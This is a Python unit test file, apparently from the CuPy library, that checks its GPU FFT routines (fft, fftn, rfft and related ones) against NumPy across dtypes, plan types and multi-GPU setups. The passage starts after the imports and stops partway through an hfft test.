from cupy.fft.fft import _default_fft_func, _fft, _fftn
def nd_planning_states(states=[True, False], name='enable_nd'):
"""Decorator for parameterized tests with and wihout nd planning
Tests are repeated with config.enable_nd_planning set to True and False
Args:
states(list of bool): The boolean cases to test.
name(str): Argument name to which specified dtypes are passed.
This decorator adds a keyword argument specified by ``name``
to the test fixture. Then, it runs the fixtures in parallel
by passing the each element of ``dtypes`` to the named
argument.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
# get original global planning state
planning_state = config.enable_nd_planning
try:
for nd_planning in states:
try:
# enable or disable nd planning
config.enable_nd_planning = nd_planning
kw[name] = nd_planning
impl(self, *args, **kw)
except Exception:
print(name, 'is', nd_planning)
raise
finally:
# restore original global planning state
config.enable_nd_planning = planning_state
return test_func
return decorator
def multi_gpu_config(gpu_configs=None):
"""Decorator for parameterized tests with different GPU configurations.
Args:
gpu_configs(list of list): The GPUs to test.
.. notes:
The decorated tests are skipped if no or only one GPU is available.
"""
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
use_multi_gpus = config.use_multi_gpus
_devices = config._devices
try:
for gpus in gpu_configs:
try:
nGPUs = len(gpus)
assert nGPUs >= 2, 'Must use at least two gpus'
config.use_multi_gpus = True
config.set_cufft_gpus(gpus)
impl(self, *args, **kw)
except Exception:
print('GPU config is:', gpus)
raise
finally:
config.use_multi_gpus = use_multi_gpus
config._devices = _devices
return test_func
return decorator
def _size_last_transform_axis(shape, s, axes):
if s is not None:
if s[-1] is not None:
return s[-1]
elif axes is not None:
return shape[axes[-1]]
return shape[-1]
@testing.parameterize(*testing.product({
'n': [None, 0, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho', ''],
}))
@testing.gpu
class TestFft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
# NumPy 1.17.0 and 1.17.1 raises ZeroDivisonError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.gpu
class TestFftOrder(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft alway returns np.complex128
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
# Almost identical to the TestFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'n': [None, 0, 64],
'shape': [(64,), (4, 64)],
'norm': [None, 'ortho', ''],
}))
@testing.with_requires('numpy>=1.10.0')
@testing.multi_gpu(2)
class TestMultiGpuFft(unittest.TestCase):
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
# NumPy 1.17.0 and 1.17.1 raises ZeroDivisonError due to a bug
@testing.with_requires('numpy!=1.17.0')
@testing.with_requires('numpy!=1.17.1')
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
# Almost identical to the TestFftOrder class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'shape': [(10, 10), (10, 5, 10)],
'data_order': ['F', 'C'],
'axis': [0, 1, -1],
}))
@testing.with_requires('numpy>=1.10.0')
@testing.multi_gpu(2)
class TestMultiGpuFftOrder(unittest.TestCase):
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.fft(a, axis=self.axis)
# np.fft.fft alway returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if self.data_order == 'F':
a = xp.asfortranarray(a)
out = xp.fft.ifft(a, axis=self.axis)
# np.fft.fft alway returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(dtype)
return out
@testing.gpu
class TestDefaultPlanType(unittest.TestCase):
@nd_planning_states()
def test_default_fft_func(self, enable_nd):
# test cases where nd CUFFT plan is possible
ca = cupy.ones((16, 16, 16))
for axes in [(0, 1), (1, 2), None, (0, 1, 2)]:
fft_func = _default_fft_func(ca, axes=axes)
if enable_nd:
assert fft_func is _fftn
else:
assert fft_func is _fft
# only a single axis is transformed -> 1d plan preferred
for axes in [(0, ), (1, ), (2, )]:
assert _default_fft_func(ca, axes=axes) is _fft
# non-contiguous axes -> nd plan not possible
assert _default_fft_func(ca, axes=(0, 2)) is _fft
# >3 axes transformed -> nd plan not possible
ca = cupy.ones((2, 4, 6, 8))
assert _default_fft_func(ca) is _fft
# first or last axis not included -> nd plan not possible
assert _default_fft_func(ca, axes=(1, )) is _fft
@testing.gpu
@testing.slow
class TestFftAllocate(unittest.TestCase):
def test_fft_allocate(self):
# Check CuFFTError is not raised when the GPU memory is enough.
# See https://github.com/cupy/cupy/issues/1063
# TODO(mizuno): Simplify "a" after memory compaction is implemented.
a = []
for i in range(10):
a.append(cupy.empty(100000000))
del a
b = cupy.empty(100000007, dtype=cupy.float32)
cupy.fft.fft(b)
# Free huge memory for slow test
del b
cupy.get_default_memory_pool().free_all_blocks()
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestFft2(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft2(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': [-1, -2], 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (4, 3, 2), 'axes': (2, 0, 1), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if self.axes is not None and not self.axes:
assert out is a
return out
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
)
@testing.gpu
class TestPlanCtxManagerFftn(unittest.TestCase):
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.fftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifftn(self, xp, dtype, enable_nd):
assert config.enable_nd_planning == enable_nd
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
plan = get_fft_plan(a, self.s, self.axes)
with plan:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
else:
out = xp.fft.ifftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@nd_planning_states()
@testing.for_complex_dtypes()
def test_fftn_error_on_wrong_plan(self, dtype, enable_nd):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fftn
assert config.enable_nd_planning == enable_nd
# can't get a plan, so skip
if self.axes is not None:
if self.s is not None:
if len(self.s) != len(self.axes):
return
elif len(self.shape) != len(self.axes):
return
a = testing.shaped_random(self.shape, cupy, dtype)
bad_in_shape = tuple(2*i for i in self.shape)
if self.s is None:
bad_out_shape = bad_in_shape
else:
bad_out_shape = tuple(2*i for i in self.s)
b = testing.shaped_random(bad_in_shape, cupy, dtype)
plan_wrong = get_fft_plan(b, bad_out_shape, self.axes)
with pytest.raises(ValueError) as ex, plan_wrong:
fftn(a, s=self.s, axes=self.axes, norm=self.norm)
# targeting a particular error
assert 'The CUFFT plan and a.shape do not match' in str(ex.value)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), ],
'norm': [None, 'ortho'],
}))
@testing.gpu
class TestPlanCtxManagerFft(unittest.TestCase):
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(5*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
# Almost identical to the TestPlanCtxManagerFft class, except that
# 1. multi-GPU cuFFT is used
# 2. the tested parameter combinations are adjusted to meet the requirements
@testing.parameterize(*testing.product({
'n': [None, 64],
'shape': [(64,), (128,)],
'norm': [None, 'ortho'],
}))
@testing.with_requires('numpy>=1.10.0')
@testing.multi_gpu(2)
class TestMultiGpuPlanCtxManagerFft(unittest.TestCase):
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_fft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.fft(a, n=self.n, norm=self.norm)
# np.fft.fft alway returns np.complex128
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_ifft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
if xp is cupy:
from cupyx.scipy.fftpack import get_fft_plan
shape = (self.n,) if self.n is not None else None
plan = get_fft_plan(a, shape=shape)
assert isinstance(plan, cupy.cuda.cufft.Plan1d)
with plan:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
else:
out = xp.fft.ifft(a, n=self.n, norm=self.norm)
if xp is np and dtype is np.complex64:
out = out.astype(np.complex64)
return out
@multi_gpu_config(gpu_configs=[[0, 1], [1, 0]])
@testing.for_complex_dtypes()
def test_fft_error_on_wrong_plan(self, dtype):
# This test ensures the context manager plan is picked up
from cupyx.scipy.fftpack import get_fft_plan
from cupy.fft import fft
a = testing.shaped_random(self.shape, cupy, dtype)
bad_shape = tuple(4*i for i in self.shape)
b = testing.shaped_random(bad_shape, cupy, dtype)
plan_wrong = get_fft_plan(b)
assert isinstance(plan_wrong, cupy.cuda.cufft.Plan1d)
with pytest.raises(ValueError) as ex, plan_wrong:
fft(a, n=self.n, norm=self.norm)
# targeting a particular error
assert 'Target array size does not match the plan.' in str(ex.value)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': (-3, -2, -1), 'norm': None},
)
@testing.gpu
class TestFftnContiguity(unittest.TestCase):
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_fftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.fftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@nd_planning_states([True])
@testing.for_all_dtypes()
def test_ifftn_orders(self, dtype, enable_nd):
for order in ['C', 'F']:
a = testing.shaped_random(self.shape, cupy, dtype)
if order == 'F':
a = cupy.asfortranarray(a)
out = cupy.fft.ifftn(a, s=self.s, axes=self.axes)
fft_func = _default_fft_func(a, s=self.s, axes=self.axes)
if fft_func is _fftn:
# nd plans have output with contiguity matching the input
self.assertEqual(out.flags.c_contiguous, a.flags.c_contiguous)
self.assertEqual(out.flags.f_contiguous, a.flags.f_contiguous)
else:
# 1d planning case doesn't guarantee preserved contiguity
pass
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
class TestRfft(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_rfft(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.n is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_irfft(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft(a, n=self.n, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestRfft2(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfft2(self, xp, dtype):
# the scaling of old Numpy is incorrect
if np.__version__ < np.lib.NumpyVersion('1.13.0'):
if self.s is not None:
return xp.empty(0)
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfft2(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfft2(a, s=self.s, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfft2EmptyAxes(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
def test_rfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfft2(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.for_all_dtypes()
def test_irfft2(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfft2(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, None), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': (1, 5), 'axes': None, 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-2, -1), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (-1, -2), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': (0,), 'norm': None},
{'shape': (3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, None), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': (1, 4, 10), 'axes': None, 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-3, -2, -1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (-1, -2, -3), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (0, 1), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': None, 'norm': 'ortho'},
{'shape': (2, 3, 4), 's': (2, 3), 'axes': (0, 1, 2), 'norm': 'ortho'},
{'shape': (2, 3, 4, 5), 's': None, 'axes': None, 'norm': None},
)
@testing.gpu
class TestRfftn(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_rfftn(self, xp, dtype):
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.complex64)
return out
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, accept_error=ValueError,
contiguous_check=False)
def test_irfftn(self, xp, dtype):
if (10020 >= cupy.cuda.runtime.runtimeGetVersion() >= 10010
and int(cupy.cuda.device.get_compute_capability()) < 70
and _size_last_transform_axis(
self.shape, self.s, self.axes) == 2):
raise unittest.SkipTest('work-around for cuFFT issue')
a = testing.shaped_random(self.shape, xp, dtype)
out = xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
if xp is np and dtype in [np.float16, np.float32, np.complex64]:
out = out.astype(np.float32)
return out
@testing.parameterize(
{'shape': (3, 4), 's': None, 'axes': (), 'norm': None},
{'shape': (2, 3, 4), 's': None, 'axes': (), 'norm': None},
)
@testing.gpu
class TestRfftnEmptyAxes(unittest.TestCase):
@testing.for_all_dtypes(no_complex=True)
def test_rfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.rfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.for_all_dtypes()
def test_irfftn(self, dtype):
for xp in (np, cupy):
a = testing.shaped_random(self.shape, xp, dtype)
with pytest.raises(IndexError):
xp.fft.irfftn(a, s=self.s, axes=self.axes, norm=self.norm)
@testing.parameterize(*testing.product({
'n': [None, 5, 10, 15],
'shape': [(10,), (10, 10)],
'norm': [None, 'ortho'],
}))
@testing.gpu
class TestHfft(unittest.TestCase):
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(rtol=1e-4, atol=1e-7, contiguous_check=False)
def test_hfft(self, xp, dtype):
